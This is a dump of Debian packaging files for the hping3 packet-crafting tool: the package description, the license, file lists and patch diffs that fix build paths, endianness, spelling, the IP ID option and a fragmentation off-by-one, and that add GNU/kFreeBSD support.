git://git.debian.org/collab-maint/hping3.git 10 | 11 | Package: hping3 12 | Architecture: any 13 | Depends: ${shlibs:Depends} 14 | Description: Active Network Smashing Tool 15 | hping3 is a network tool able to send custom ICMP/UDP/TCP packets and 16 | to display target replies like ping does with ICMP replies. It handles 17 | fragmentation and arbitrary packet body and size, and can be used to 18 | transfer files under supported protocols. Using hping3, you can test 19 | firewall rules, perform (spoofed) port scanning, test network 20 | performance using different protocols, do path MTU discovery, perform 21 | traceroute-like actions under different protocols, fingerprint remote 22 | operating systems, audit TCP/IP stacks, etc. hping3 is scriptable 23 | using the Tcl language. 24 | -------------------------------------------------------------------------------- /debian/copyright: -------------------------------------------------------------------------------- 1 | This package was debianized by Vincent Tantardini on 2 | Sun, 10 Oct 2004 20:24:03 +0200. 3 | Previously maintained by Romain Francoise (until 2009) 4 | and now by Guillaume Delacour 5 | 6 | It was downloaded from http://www.hping.org/download.php 7 | 8 | Copyright: 9 | 10 | hping3 is Copyright (C) 1998, 2004 by Salvatore Sanfilippo. 11 | 12 | Upstream Author: 13 | 14 | Salvatore Sanfilippo 15 | 16 | License: 17 | 18 | GPL-2 19 | 20 | However, some files are licenced under other licences: 21 | 22 | display_ipopt.c : from ping, BSD style license (4-clause BSD) 23 | libpcap library : BSD style license (3-clause BSD) 24 | 25 | On Debian systems, the complete text of the Modified BSD Licence 26 | can be found in `/usr/share/common-licenses/BSD'. 27 | 28 | This package is free software; you can redistribute it and/or modify 29 | it under the terms of the GNU General Public License as published by 30 | the Free Software Foundation; version 2 dated June, 1991. 31 | 32 | This package is distributed in the hope that it will be useful, 33 | but WITHOUT ANY WARRANTY; without even the implied warranty of 34 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 35 | GNU General Public License for more details. 36 | 37 | You should have received a copy of the GNU General Public License along 38 | with this program; if not, write to the Free Software Foundation, Inc., 39 | 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA 40 | 41 | On Debian systems, the complete text of the GNU General 42 | Public License can be found in `/usr/share/common-licenses/GPL-2'. 43 | -------------------------------------------------------------------------------- /debian/dirs: -------------------------------------------------------------------------------- 1 | usr/sbin 2 | -------------------------------------------------------------------------------- /debian/hping3.docs: -------------------------------------------------------------------------------- 1 | BUGS 2 | NEWS 3 | README 4 | TODO 5 | docs/APD.txt 6 | docs/API.txt 7 | docs/AS-BACKDOOR 8 | docs/HPING3.txt 9 | docs/MORE-FUN-WITH-IPID 10 | docs/SPOOFED_SCAN.txt 11 | -------------------------------------------------------------------------------- /debian/hping3.examples: -------------------------------------------------------------------------------- 1 | lib/apd.htcl 2 | lib/apd2.htcl 3 | lib/ciscoios.htcl 4 | lib/ciscoios0.htcl 5 | lib/cloner.htcl 6 | lib/hpingstdlib.htcl 7 | lib/igrp.htcl 8 | lib/nat-noise.htcl 9 | lib/passivets.htcl 10 | lib/ping.htcl 11 | lib/raw.htcl 12 | lib/show-tcpseq.htcl 13 | lib/showled.htcl 14 | -------------------------------------------------------------------------------- /debian/hping3.manpages: -------------------------------------------------------------------------------- 1 | docs/hping3.8 2 | -------------------------------------------------------------------------------- /debian/patches/010_install.diff: -------------------------------------------------------------------------------- 1 | Adjust upstream Makefile.in for Debian compilation. 2 | 3 | --- hping3-3.a2.ds1.orig/Makefile.in 4 | +++ hping3-3.a2.ds1/Makefile.in 5 | @@ -50,14 +50,14 @@ 6 | $(RANLIB) $@ 7 | 8 | hping3: byteorder.h $(OBJ) 9 | - $(CC) -o hping3 $(CCOPT) $(DEBUG) $(OBJ) -L/usr/local/lib $(PCAP) @SOLARISLIB@ @TCL_LIB@ 10 | + $(CC) -o hping3 $(CCOPT) $(DEBUG) $(OBJ) -L$(prefix)/lib $(PCAP) @SOLARISLIB@ @TCL_LIB@ 11 | @echo 12 | ./hping3 -v 13 | @echo "use \`make strip' to strip hping3 binary" 14 | @echo "use \`make install' to install hping3" 15 | 16 | hping3-static: byteorder.h $(OBJ) 17 | - $(CC) -static -o hping3-static $(CCOPT) $(DEBUG) $(OBJ) -L/usr/local/lib $(PCAP) @SOLARISLIB@ @TCL_LIB@ -ldl 18 | + $(CC) -static -o hping3-static $(CCOPT) $(DEBUG) $(OBJ) -L$(prefix)/lib $(PCAP) @SOLARISLIB@ @TCL_LIB@ -ldl 19 | 20 | byteorder.h: 21 | ./configure 22 | @@ -72,17 +72,7 @@ 23 | rm -rf hping3 *.o byteorder byteorder.h systype.h Makefile libars.a .depend 24 | 25 | install: hping3 26 | - cp -f hping3 /usr/sbin/ 27 | - chmod 755 /usr/sbin/hping3 28 | - ln -s /usr/sbin/hping3 /usr/sbin/hping 29 | - ln -s /usr/sbin/hping3 /usr/sbin/hping2 30 | - @if [ -d ${INSTALL_MANPATH}/man8 ]; then \ 31 | - cp ./docs/hping3.8 ${INSTALL_MANPATH}/man8; \ 32 | - chmod 644 ${INSTALL_MANPATH}/man8/hping3.8; \ 33 | - else \ 34 | - echo "@@@@@@ WARNING @@@@@@"; \ 35 | - echo "Can't install the man page: ${INSTALL_MANPATH}/man8 does not exist"; \ 36 | - fi 37 | + install -m 0755 hping3 $(DESTDIR)/usr/sbin/ 38 | 39 | strip: hping3 40 | @ls -l ./hping3 41 | -------------------------------------------------------------------------------- /debian/patches/020_libpcap0.8.diff: -------------------------------------------------------------------------------- 1 | Various fixes for libpcap0.8 compilation. 2 | 3 | --- hping3-3.a2.ds1.orig/libpcap_stuff.c 4 | +++ hping3-3.a2.ds1/libpcap_stuff.c 5 | @@ -17,7 +17,6 @@ 6 | #include 7 | #include 8 | #include 9 | -#include 10 | 11 | #include "globals.h" 12 | 13 | --- hping3-3.a2.ds1.orig/script.c 14 | +++ hping3-3.a2.ds1/script.c 15 | @@ -24,7 +24,6 @@ 16 | 17 | #include 18 | #include 19 | -#include 20 | 21 | #include "release.h" 22 | #include "hping2.h" 23 | -------------------------------------------------------------------------------- /debian/patches/030_bytesex.diff: -------------------------------------------------------------------------------- 1 | Endianness fixes. 2 | 3 | --- hping3-3.a2.ds1.orig/bytesex.h 4 | +++ hping3-3.a2.ds1/bytesex.h 5 | @@ -7,16 +7,11 @@ 6 | #ifndef ARS_BYTESEX_H 7 | #define ARS_BYTESEX_H 8 | 9 | -#if defined(__i386__) \ 10 | - || defined(__alpha__) \ 11 | - || (defined(__mips__) && (defined(MIPSEL) || defined (__MIPSEL__))) 12 | +#include 13 | + 14 | +#if __BYTE_ORDER == __LITTLE_ENDIAN 15 | #define BYTE_ORDER_LITTLE_ENDIAN 16 | -#elif defined(__mc68000__) \ 17 | - || defined (__sparc__) \ 18 | - || defined (__sparc) \ 19 | - || defined (__PPC__) \ 20 | - || defined (__BIG_ENDIAN__) \ 21 | - || (defined(__mips__) && (defined(MIPSEB) || defined (__MIPSEB__))) 22 | +#elif __BYTE_ORDER == __BIG_ENDIAN 23 | #define BYTE_ORDER_BIG_ENDIAN 24 | #else 25 | # error can not find the byte order for this architecture, fix bytesex.h 26 | -------------------------------------------------------------------------------- /debian/patches/040_spelling.diff: -------------------------------------------------------------------------------- 1 | Various spelling fixes. 2 | 3 | --- hping3-3.a2.ds1.orig/antigetopt.c 4 | +++ hping3-3.a2.ds1/antigetopt.c 5 | @@ -142,7 +142,7 @@ 6 | #define UNK_LONG_ERRSTRING "unrecognized option `--%s'\n" 7 | #define ARG_SHORT_ERRSTRING "option requires an argument -- %c\n" 8 | #define ARG_LONG_ERRSTRING "option `--%s' requires an argument\n" 9 | -#define AMB_ERRSTRING "option `--%s' is ambiguos\n" 10 | +#define AMB_ERRSTRING "option `--%s' is ambiguous\n" 11 | #define IERR_ERRSTRING "internal error. ago_gnu_error() called with " \ 12 | "a bad error code (%d)\n" 13 | void ago_gnu_error(char *pname, int error) 14 | --- hping3-3.a2.ds1.orig/statistics.c 15 | +++ hping3-3.a2.ds1/statistics.c 16 | @@ -30,7 +30,7 @@ 17 | lossrate = 100; 18 | 19 | fprintf(stderr, "\n--- %s hping statistic ---\n", targetname); 20 | - fprintf(stderr, "%d packets tramitted, %d packets received, " 21 | + fprintf(stderr, "%d packets transmitted, %d packets received, " 22 | "%d%% packet loss\n", sent_pkt, recv_pkt, lossrate); 23 | if (out_of_sequence_pkt) 24 | fprintf(stderr, "%d out of sequence packets received\n", 25 | -------------------------------------------------------------------------------- /debian/patches/060_version.diff: -------------------------------------------------------------------------------- 1 | Fix hping version. 2 | 3 | --- hping3-3.a2.ds1.orig/release.h 4 | +++ hping3-3.a2.ds1/release.h 5 | @@ -11,7 +11,7 @@ 6 | #ifndef _RELEASE_H 7 | #define _RELEASE_H 8 | 9 | -#define RELEASE_VERSION "3.0.0-alpha-1" 10 | +#define RELEASE_VERSION "3.0.0-alpha-2" 11 | #define RELEASE_DATE "$Id: release.h,v 1.4 2004/04/09 23:38:56 antirez Exp $" 12 | #define CONTACTS "" 13 | 14 | -------------------------------------------------------------------------------- /debian/patches/070_tcl.diff: -------------------------------------------------------------------------------- 1 | Harcode libtcl version to be that of the default tclsh. 2 | 3 | --- a/configure 4 | +++ b/configure 5 | @@ -98,7 +98,7 @@ 6 | fi 7 | if [ -n $USE_TCL ] 8 | then 9 | - LIBPOSTFIX=`ls -1 /usr/local/lib/ /usr/lib | grep 'libtcl[0-9]' | grep so | sed -e 's/\.so.*//g' -e 's/libtcl//g' | sort -r | head -1` 10 | + LIBPOSTFIX=`echo puts \\$tcl_version | $TCLSH -` 11 | TCL_LIB="-ltcl${LIBPOSTFIX} -lm -lpthread" 12 | fi 13 | 14 | -------------------------------------------------------------------------------- /debian/patches/080_ip_id_field.diff: -------------------------------------------------------------------------------- 1 | Fix "-N" command line argument 2 | 3 | --- a/docs/hping2.8 4 | +++ b/docs/hping2.8 5 | @@ -343,7 +343,7 @@ 6 | .I -N --id 7 | Set ip->id field. Default id is random but if fragmentation is turned on 8 | and id isn't specified it will be 9 | -.BR "getpid() & 0xFF" , 10 | +.BR "getpid() & 0xFFFF" , 11 | to implement a better solution is in TODO list. 12 | .TP 13 | .I -H --ipproto 14 | @@ -714,4 +714,4 @@ 15 | a solaris problem, as stated in the tcpdump-workers mailing list, 16 | so the libpcap can't do nothing to handle it properly. 17 | .SH SEE ALSO 18 | -ping(8), traceroute(8), ifconfig(8), nmap(1) 19 | \ No newline at end of file 20 | +ping(8), traceroute(8), ifconfig(8), nmap(1) 21 | --- a/docs/hping3.8 22 | +++ b/docs/hping3.8 23 | @@ -352,7 +352,7 @@ 24 | .I -N --id 25 | Set ip->id field. Default id is random but if fragmentation is turned on 26 | and id isn't specified it will be 27 | -.BR "getpid() & 0xFF" , 28 | +.BR "getpid() & 0xFFFF" , 29 | to implement a better solution is in TODO list. 30 | .TP 31 | .I -H --ipproto 32 | --- a/hping2.h 33 | +++ b/hping2.h 34 | @@ -121,7 +121,7 @@ 35 | #define DEFAULT_ICMP_IP_IHL (IPHDR_SIZE >> 2) 36 | #define DEFAULT_ICMP_IP_TOS 0 37 | #define DEFAULT_ICMP_IP_TOT_LEN 0 /* computed by send_icmp_*() */ 38 | -#define DEFAULT_ICMP_IP_ID 0 /* rand */ 39 | +#define DEFAULT_ICMP_IP_ID -1 /* rand */ 40 | #define DEFAULT_ICMP_CKSUM -1 /* -1 means compute the cksum */ 41 | #define DEFAULT_ICMP_IP_PROTOCOL 6 /* TCP */ 42 | #define DEFAULT_RAW_IP_PROTOCOL 6 /* TCP */ 43 | --- a/parseoptions.c 44 | +++ b/parseoptions.c 45 | @@ -463,6 +463,10 @@ 46 | break; 47 | case OPT_ICMP_IPID: 48 | icmp_ip_id = strtol(ago_optarg, NULL, 0); 49 | + if (icmp_ip_id < 0 || icmp_ip_id > 0xffff) { 50 | + fprintf(stderr, "Bad ICMP IP ID, resetting to random.\n"); 51 | + icmp_ip_id = DEFAULT_ICMP_IP_ID; 52 | + } 53 | break; 54 | case OPT_ICMP_IPPROTO: 55 | icmp_ip_protocol = strtol(ago_optarg, NULL, 0); 56 | --- a/sendicmp.c 57 | +++ b/sendicmp.c 58 | @@ -83,7 +83,7 @@ 59 | icmp->type = opt_icmptype; /* echo replay or echo request */ 60 | icmp->code = opt_icmpcode; /* should be indifferent */ 61 | icmp->checksum = 0; 62 | - icmp->un.echo.id = getpid() & 0xffff; 63 | + icmp->un.echo.id = icmp_ip_id == DEFAULT_ICMP_IP_ID ? getpid() & 0xffff : icmp_ip_id; 64 | icmp->un.echo.sequence = _icmp_seq; 65 | 66 | /* data */ 67 | -------------------------------------------------------------------------------- /debian/patches/090_fr_manpage.diff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/NullHypothesis/hping3/d177ea2995f0e111c6ab50dcd9c3b0613ab07a01/debian/patches/090_fr_manpage.diff -------------------------------------------------------------------------------- /debian/patches/100_hyphen_used_as_minus_sign.diff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/NullHypothesis/hping3/d177ea2995f0e111c6ab50dcd9c3b0613ab07a01/debian/patches/100_hyphen_used_as_minus_sign.diff -------------------------------------------------------------------------------- /debian/patches/110_dontfrag_offbyone.diff: -------------------------------------------------------------------------------- 1 | Off-by-one error with --dontfrag (#537704). 2 | 3 | --- a/sendip_handler.c 4 | +++ b/sendip_handler.c 5 | @@ -19,7 +19,7 @@ 6 | { 7 | ip_optlen = ip_opt_build(ip_opt); 8 | 9 | - if (!opt_fragment && (size+ip_optlen+20 >= h_if_mtu)) 10 | + if (!opt_fragment && (size+ip_optlen+20 > h_if_mtu)) 11 | { 12 | /* auto-activate fragmentation */ 13 | virtual_mtu = h_if_mtu-20; 14 | -------------------------------------------------------------------------------- /debian/patches/120_rtt_icmp_unreachable.diff: -------------------------------------------------------------------------------- 1 | Add RTT handling for ICMP destination unreachable packets. 2 | 3 | --- a/waitpacket.c 4 | +++ b/waitpacket.c 5 | @@ -229,6 +229,7 @@ 6 | { 7 | struct myicmphdr icmp; 8 | struct myiphdr quoted_ip; 9 | + struct myudphdr quoted_udp; 10 | 11 | /* Check if the packet can contain the ICMP header */ 12 | if (size < ICMPHDR_SIZE) { 13 | @@ -286,6 +287,18 @@ 14 | case 3: 15 | if (!opt_quiet) 16 | log_icmp_unreach(inet_ntoa(src), icmp.code); 17 | + if (quoted_ip.protocol == IPPROTO_UDP) 18 | + { 19 | + int sequence = 0, status; 20 | + float ms_delay = 0.0; 21 | + unsigned short port; 22 | + 23 | + /* Get RTT for UDP packet */ 24 | + memcpy("ed_udp, packet+ICMPHDR_SIZE+(quoted_ip.ihl<<2), sizeof(quoted_udp)); 25 | + port = ntohs(quoted_udp.uh_sport); 26 | + status = rtt(&sequence, port, &ms_delay); 27 | + printf("status=%d port=%d seq=%d\n", status, port, sequence); 28 | + } 29 | return 1; 30 | case 11: 31 | if (opt_traceroute) 32 | -------------------------------------------------------------------------------- /debian/patches/130_spelling_error_in_binary.diff: -------------------------------------------------------------------------------- 1 | Fix spelling error in binary (lintian -IE) 2 | 3 | --- a/parseoptions.c 4 | +++ b/parseoptions.c 5 | @@ -174,7 +174,7 @@ 6 | str[j++] = '/'; 7 | break; 8 | } 9 | - fprintf(stderr, "invalid IP adress in route\n"); 10 | + fprintf(stderr, "invalid IP address in route\n"); 11 | fail_parse_route(); 12 | case ':': 13 | if ((!i) && j && j < 4) 14 | --- a/getifname.c 15 | +++ b/getifname.c 16 | @@ -206,7 +206,7 @@ 17 | printf("DEBUG: Output interface address: %s\n", 18 | inet_ntoa(output_if_addr.sin_addr)); 19 | /* Put something in saved_ifname in order to tell 20 | - that the output adress is known */ 21 | + that the output address is known */ 22 | saved_ifname[0] = 'X'; saved_ifname[1] = 0; 23 | } else { 24 | fprintf(stderr, "Warning: Unable to guess the output " 25 | --- a/usage.c 26 | +++ b/usage.c 27 | @@ -50,7 +50,7 @@ 28 | " -r --rel relativize id field (to estimate host traffic)\n" 29 | " -f --frag split packets in more frag. (may pass weak acl)\n" 30 | " -x --morefrag set more fragments flag\n" 31 | -" -y --dontfrag set dont fragment flag\n" 32 | +" -y --dontfrag set don't fragment flag\n" 33 | " -g --fragoff set the fragment offset\n" 34 | " -m --mtu set virtual mtu, implies --frag if packet size > mtu\n" 35 | " -o --tos type of service (default 0x00), try --tos help\n" 36 | @@ -126,8 +126,8 @@ 37 | "ICMP help:\n" 38 | " ICMP concerned packet options:\n" 39 | " --icmp-ipver set ip version ( default 4 )\n" 40 | -" --icmp-iphlen set ip header lenght ( default IPHDR_SIZE >> 2)\n" 41 | -" --icmp-iplen set ip total lengtht ( default real lenght )\n" 42 | +" --icmp-iphlen set ip header length ( default IPHDR_SIZE >> 2)\n" 43 | +" --icmp-iplen set ip total length ( default real length )\n" 44 | " --icmp-ipid set ip id ( default random )\n" 45 | " --icmp-ipproto set ip protocol ( default IPPROTO_TCP )\n" 46 | " --icmp-ipsrc set ip source ( default 0.0.0.0 )\n" 47 | --- a/sendtcp.c 48 | +++ b/sendtcp.c 49 | @@ -50,7 +50,7 @@ 50 | memcpy(&pseudoheader->saddr, &local.sin_addr.s_addr, 4); 51 | memcpy(&pseudoheader->daddr, &remote.sin_addr.s_addr, 4); 52 | pseudoheader->protocol = 6; /* tcp */ 53 | - pseudoheader->lenght = htons(TCPHDR_SIZE+tcp_opt_size+data_size); 54 | + pseudoheader->length = htons(TCPHDR_SIZE+tcp_opt_size+data_size); 55 | 56 | /* tcp header */ 57 | tcp->th_dport = htons(dst_port); 58 | --- a/sendudp.c 59 | +++ b/sendudp.c 60 | @@ -46,7 +46,7 @@ 61 | memcpy(&pseudoheader->saddr, &local.sin_addr.s_addr, 4); 62 | memcpy(&pseudoheader->daddr, &remote.sin_addr.s_addr, 4); 63 | pseudoheader->protocol = 17; /* udp */ 64 | - pseudoheader->lenght = htons(packet_size); 65 | + pseudoheader->length = htons(packet_size); 66 | 67 | /* udp header */ 68 | udp->uh_dport = htons(dst_port); 69 | --- a/sendicmp.c 70 | +++ b/sendicmp.c 71 | @@ -243,7 +243,7 @@ 72 | memcpy(&pseudoheader->saddr, &icmp_ip_src.sin_addr.s_addr, 4); 73 | memcpy(&pseudoheader->daddr, &icmp_ip_dst.sin_addr.s_addr, 4); 74 | pseudoheader->protocol = icmp_ip.protocol; 75 | - pseudoheader->lenght = icmp_ip.tot_len; 76 | + pseudoheader->length = icmp_ip.tot_len; 77 | icmp_udp->uh_sport = htons(icmp_ip_srcport); 78 | icmp_udp->uh_dport = htons(icmp_ip_dstport); 79 | icmp_udp->uh_ulen = htons(UDPHDR_SIZE + udp_data_len); 80 | --- a/hping2.h 81 | +++ b/hping2.h 82 | @@ -134,7 +134,7 @@ 83 | 84 | /* fragmentation defines */ 85 | #define MF ((unsigned short)0x2000) /* more fragments */ 86 | -#define DF ((unsigned short)0x4000) /* dont fragment */ 87 | +#define DF ((unsigned short)0x4000) /* don't fragment */ 88 | #define NF ((unsigned short)0x0000) /* no more fragments */ 89 | 90 | /* ip options defines */ 91 | @@ -337,7 +337,7 @@ 92 | __u32 daddr; 93 | __u8 zero; 94 | __u8 protocol; 95 | - __u16 lenght; 96 | + __u16 length; 97 | }; 98 | 99 | #define PSEUDOHDR_SIZE sizeof(struct pseudohdr) 100 | --- a/ars.c 101 | +++ b/ars.c 102 | @@ -698,7 +698,7 @@ 103 | memcpy(&pseudo.daddr, &ip->daddr, 4); 104 | pseudo.protocol = (pkt->p_layer[layer].l_type == ARS_TYPE_TCP) 105 | ? ARS_IPPROTO_TCP : ARS_IPPROTO_UDP; 106 | - pseudo.lenght = htons(ars_relative_size(pkt, layer)); 107 | + pseudo.length = htons(ars_relative_size(pkt, layer)); 108 | 109 | /* Finally do the checksum */ 110 | ars_multi_cksum(&mc, ARS_MC_INIT, NULL, 0); 111 | --- a/datahandler.c 112 | +++ b/datahandler.c 113 | @@ -26,7 +26,7 @@ 114 | } 115 | 116 | if (opt_sign) { 117 | - memcpy(data, sign, signlen); /* lenght pre-checked */ 118 | + memcpy(data, sign, signlen); /* length pre-checked */ 119 | data+=signlen; 120 | data_size-=signlen; 121 | } 122 | --- a/ars.h 123 | +++ b/ars.h 124 | @@ -67,7 +67,7 @@ 125 | #define ARS_MAX_IP_SIZE 65535 126 | 127 | #define ARS_IP_MF ((unsigned short)0x2000) /* more fragments */ 128 | -#define ARS_IP_DF ((unsigned short)0x4000) /* dont fragment */ 129 | +#define ARS_IP_DF ((unsigned short)0x4000) /* don't fragment */ 130 | #define ARS_IP_RF ((unsigned short)0x8000) /* reserved fragment flag */ 131 | 132 | #define ARS_IPOPT_COPY 0x80 133 | @@ -308,7 +308,7 @@ 134 | __u32 daddr; 135 | __u8 zero; 136 | __u8 protocol; 137 | - __u16 lenght; 138 | + __u16 length; 139 | }; 140 | 141 | /* The IGRP header structure */ 142 | --- a/sendip_handler.c 143 | +++ b/sendip_handler.c 144 | @@ -35,7 +35,7 @@ 145 | unsigned short fragment_flag = 0; 146 | 147 | if (opt_mf) fragment_flag |= MF; /* more fragments */ 148 | - if (opt_df) fragment_flag |= DF; /* dont fragment */ 149 | + if (opt_df) fragment_flag |= DF; /* don't fragment */ 150 | send_ip((char*)&local.sin_addr, 151 | (char*)&remote.sin_addr, 152 | packet, size, fragment_flag, ip_frag_offset, 153 | -------------------------------------------------------------------------------- /debian/patches/140_data_size_udp.diff: -------------------------------------------------------------------------------- 1 | Fix incorrect data size check for UDP. 2 | --- a/parseoptions.c 3 | +++ b/parseoptions.c 4 | @@ -569,9 +573,12 @@ 5 | if (opt_numeric == TRUE) opt_gethost = FALSE; 6 | 7 | /* some error condition */ 8 | - if (data_size+IPHDR_SIZE+TCPHDR_SIZE > 65535) { 9 | + if (data_size+IPHDR_SIZE+ 10 | + (opt_udpmode?UDPHDR_SIZE:TCPHDR_SIZE) > 65535) { 11 | printf("Option error: sorry, data size must be <= %lu\n", 12 | - (unsigned long)(65535-IPHDR_SIZE+TCPHDR_SIZE)); 13 | + (unsigned long)(65535-(IPHDR_SIZE+ 14 | + (opt_udpmode?UDPHDR_SIZE:TCPHDR_SIZE))) 15 | + ); 16 | exit(1); 17 | } 18 | else if (count <= 0 && count != -1) { 19 | -------------------------------------------------------------------------------- /debian/patches/150_gnu_kfreebsd.diff: -------------------------------------------------------------------------------- 1 | Fix FTBFS: GNU/kFreeBSD not in arch list(s) 2 | Index: hping3-3.a2.ds2/getifname.c 3 | =================================================================== 4 | --- hping3-3.a2.ds2.orig/getifname.c 2009-09-19 18:48:10.000000000 +0200 5 | +++ hping3-3.a2.ds2/getifname.c 2009-09-19 18:48:10.000000000 +0200 6 | @@ -19,7 +19,7 @@ 7 | #include 8 | 9 | #if defined(__FreeBSD__) || defined(__OpenBSD__) || defined(__NetBSD__) || \ 10 | - defined(__bsdi__) || defined(__APPLE__) 11 | + defined(__bsdi__) || defined(__APPLE__) || defined(__FreeBSD_kernel__) 12 | #include 13 | #include 14 | #endif /* defined(__*BSD__) */ 15 | @@ -29,7 +29,7 @@ 16 | 17 | #if !defined(__FreeBSD__) && !defined(__OpenBSD__) && !defined(__NetBSD__) && \ 18 | !defined(__linux__) && !defined(__sun__) && !defined(__bsdi__) && \ 19 | - !defined(__APPLE__) 20 | + !defined(__APPLE__) && !defined(__FreeBSD_kernel__) 21 | #error Sorry, interface code not implemented. 22 | #endif 23 | 24 | @@ -174,7 +174,7 @@ 25 | } 26 | 27 | #elif defined(__FreeBSD__) || defined(__NetBSD__) || defined(__OpenBSD__) || \ 28 | - defined(__bsdi__) || defined(__APPLE__) 29 | + defined(__bsdi__) || defined(__APPLE__) || defined(__FreeBSD_kernel__) 30 | 31 | /* return interface informations : 32 | - from the specified (-I) interface 33 | Index: hping3-3.a2.ds2/ars.c 34 | =================================================================== 35 | --- hping3-3.a2.ds2.orig/ars.c 2009-09-19 18:48:10.000000000 +0200 36 | +++ hping3-3.a2.ds2/ars.c 2009-09-19 18:48:10.000000000 +0200 37 | @@ -914,7 +914,8 @@ 38 | return -ARS_INVALID; 39 | } 40 | ip = (struct ars_iphdr*) packet; 41 | -#if defined OSTYPE_FREEBSD || defined OSTYPE_NETBSD || defined OSTYPE_BSDI 42 | +#if defined OSTYPE_FREEBSD || defined OSTYPE_NETBSD || defined OSTYPE_BSDI || \ 43 | + defined OSTYPE_GNUKFREEBSD 44 | ip->tot_len = ntohs(ip->tot_len); 45 | ip->frag_off = ntohs(ip->frag_off); 46 | #endif 47 | Index: hping3-3.a2.ds2/sendip.c 48 | =================================================================== 49 | --- hping3-3.a2.ds2.orig/sendip.c 2009-09-19 18:47:49.000000000 +0200 50 | +++ hping3-3.a2.ds2/sendip.c 2009-09-19 18:48:10.000000000 +0200 51 | @@ -48,7 +48,8 @@ 52 | ip->ihl = (IPHDR_SIZE + optlen + 3) >> 2; 53 | ip->tos = ip_tos; 54 | 55 | -#if defined OSTYPE_FREEBSD || defined OSTYPE_NETBSD || defined OSTYPE_BSDI 56 | +#if defined OSTYPE_FREEBSD || defined OSTYPE_NETBSD || defined OSTYPE_BSDI || \ 57 | + defined OSTYPE_GNUKFREEBSD 58 | /* FreeBSD */ 59 | /* NetBSD */ 60 | ip->tot_len = packetsize; 61 | Index: hping3-3.a2.ds2/configure 62 | =================================================================== 63 | --- hping3-3.a2.ds2.orig/configure 2009-09-19 18:48:09.000000000 +0200 64 | +++ hping3-3.a2.ds2/configure 2009-09-19 18:51:40.000000000 +0200 65 | @@ -48,6 +48,13 @@ 66 | CONFIGOSTYPE=BSDI 67 | fi 68 | 69 | +# for GNU/kFreeBSD, change GNU/KFREEBSD to GNUKFREEBSD, to 70 | +# not including '/' 71 | +if [ $CONFIGOSTYPE = "GNU/KFREEBSD" ] 72 | +then 73 | + CONFIGOSTYPE=GNUKFREEBSD 74 | +fi 75 | + 76 | case $CONFIGOSTYPE in 77 | SUNOS) 78 | SOLARISLIB="-lsocket -lresolv -lnsl" 79 | Index: hping3-3.a2.ds2/libpcap_stuff.c 80 | =================================================================== 81 | --- hping3-3.a2.ds2.orig/libpcap_stuff.c 2009-09-19 18:48:08.000000000 +0200 82 | +++ hping3-3.a2.ds2/libpcap_stuff.c 2009-09-19 18:48:10.000000000 +0200 83 | @@ -34,7 +34,8 @@ 84 | printf("[open_pcap] pcap_open_live: %s\n", errbuf); 85 | return -1; 86 | } 87 | -#if (!defined OSTYPE_LINUX) && (!defined __sun__) 88 | +#if (!defined OSTYPE_LINUX) && (!defined __sun__) && \ 89 | + (!defined OSTYPE_GNUKFREEBSD) 90 | /* Return the packets to userspace as fast as possible */ 91 | if (ioctl(pcap_fileno(pcapfp), BIOCIMMEDIATE, &on) == -1) 92 | perror("[open_pcap] ioctl(... BIOCIMMEDIATE ...)"); 93 | Index: hping3-3.a2.ds2/script.c 94 | =================================================================== 95 | --- hping3-3.a2.ds2.orig/script.c 2009-09-19 18:48:08.000000000 +0200 96 | +++ hping3-3.a2.ds2/script.c 2009-09-19 18:48:10.000000000 +0200 97 | @@ -66,7 +66,8 @@ 98 | static struct recv_handler *HpingRecvGetHandler(struct recv_handler *ra, int len, char *ifname, Tcl_Interp *interp) 99 | { 100 | int i; 101 | - #if (!defined OSTYPE_LINUX) && (!defined __sun__) 102 | + #if (!defined OSTYPE_LINUX) && (!defined __sun__) && \ 103 | + (!defined OSTYPE_GNUKFREEBSD) 104 | int on = 1; 105 | #endif 106 | 107 | @@ -87,7 +88,8 @@ 108 | ra[i].rh_pcapfp = pcap_open_live(ifname, 99999, 0, 1, ra[i].rh_pcap_errbuf); 109 | if (ra[i].rh_pcapfp == NULL) 110 | return NULL; 111 | - #if (!defined OSTYPE_LINUX) && (!defined __sun__) 112 | + #if (!defined OSTYPE_LINUX) && (!defined __sun__) && \ 113 | + (!defined OSTYPE_GNUKFREEBSD) 114 | /* Return the packets to userspace as fast as possible */ 115 | if (ioctl(pcap_fileno(ra[i].rh_pcapfp), BIOCIMMEDIATE, &on) == -1) { 116 | /* XXX non-critical error */ 117 | Index: hping3-3.a2.ds2/interface.c 118 | =================================================================== 119 | --- hping3-3.a2.ds2.orig/interface.c 2009-09-19 18:47:50.000000000 +0200 120 | +++ hping3-3.a2.ds2/interface.c 2009-09-19 18:48:10.000000000 +0200 121 | @@ -28,7 +28,7 @@ 122 | #include /* close */ 123 | 124 | #if defined(__FreeBSD__) || defined(__OpenBSD__) || defined(__NetBSD__) || \ 125 | - defined(__bsdi__) || defined(__APPLE__) 126 | + defined(__bsdi__) || defined(__APPLE__) || defined(__FreeBSD_kernel__) 127 | #include 128 | #include 129 | #include 130 | @@ -37,7 +37,7 @@ 131 | 132 | #if !defined(__FreeBSD__) && !defined(__OpenBSD__) && !defined(__NetBSD__) && \ 133 | !defined(__linux__) && !defined(__sun__) && !defined(__bsdi__) && \ 134 | - !defined(__APPLE__) 135 | + !defined(__APPLE__) && !defined(__FreeBSD_kernel__) 136 | #error Sorry, interface code not implemented. 137 | #endif 138 | 139 | @@ -187,7 +187,7 @@ 140 | #endif 141 | 142 | #if defined(__FreeBSD__) || defined(__NetBSD__) || defined(__OpenBSD__) || \ 143 | - defined(__bsdi__) || defined(__APPLE__) 144 | + defined(__bsdi__) || defined(__APPLE__) || defined(__FreeBSD_kernel__) 145 | /* I wish getifaddrs() API on linux... -- SS */ 146 | int hping_get_interfaces(struct hpingif *hif, int ilen) 147 | { 148 | -------------------------------------------------------------------------------- /debian/patches/160_tcp_mss.diff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/NullHypothesis/hping3/d177ea2995f0e111c6ab50dcd9c3b0613ab07a01/debian/patches/160_tcp_mss.diff -------------------------------------------------------------------------------- /debian/patches/series: -------------------------------------------------------------------------------- 1 | 010_install.diff 2 | 020_libpcap0.8.diff 3 | 030_bytesex.diff 4 | 040_spelling.diff 5 | 050_personality.diff 6 | 060_version.diff 7 | 070_tcl.diff 8 | 080_ip_id_field.diff 9 | 090_fr_manpage.diff 10 | 